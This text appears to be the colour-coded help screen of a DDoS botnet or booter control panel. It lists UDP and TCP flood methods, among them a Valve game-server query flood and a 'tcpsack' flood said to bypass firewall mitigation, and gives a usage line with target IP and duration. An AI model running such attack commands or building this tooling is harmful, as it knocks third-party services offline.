 \033[1;36m udpflood  \033[1;35m:\033[1;37m generic udp plain flood
 \033[1;36m udphex    \033[1;35m:\033[1;37m complex udp hex flood
 \033[1;36m udprand   \033[1;35m:\033[1;37m udp flood creates multiple sockets with random payload
 \033[1;36m udpwizard \033[1;35m:\033[1;37m advanced udp flood with random payloads
 \033[1;36m vseflood  \033[1;35m:\033[1;37m valve source engine query udp flood
 \033[1;36m synflood  \033[1;35m:\033[1;37m tcp syn flood, Flags (URG, ACK, PSH, RST, SYN, FIN)
 \033[1;36m ackflood  \033[1;35m:\033[1;37m tcp ackflood with random payload data
 \033[1;36m wraflood  \033[1;35m:\033[1;37m tcp wra flood
 \033[1;36m tcpstream \033[1;35m:\033[1;37m tcp packet stream flood
 \033[1;36m tcpsack   \033[1;35m:\033[1;37m tcpsack flood bypass mitigated networks/firewall
 \033[1;36m socket    \033[1;35m:\033[1;37m tcp handshake with socket
 \033[1;36m handshake \033[1;35m:\033[1;37m tcp syn+ack handshake flood 
 \033[1;36m tcppsh    \033[1;35m:\033[1;37m tcp syn+psh handshake with various TCP flags
 \033[1;37mAvailable Method Flags\033[1;36m:\033[1;37m
 \033[1;35m  -   \033[1;36mhandshake \033[1;37m[\033[1;36mtarget\033[1;37m] [\033[1;36mtime\033[1;37m] [ '\033[1;36m?\033[1;37m' for options]
 \033[1;37m Ex \033[1;35m: \033[1;36mhandshake\033[1;37m 127.0.0.1 1200 \033[1;35m?\033[1;37m
 \033[1;37m
 \033[0m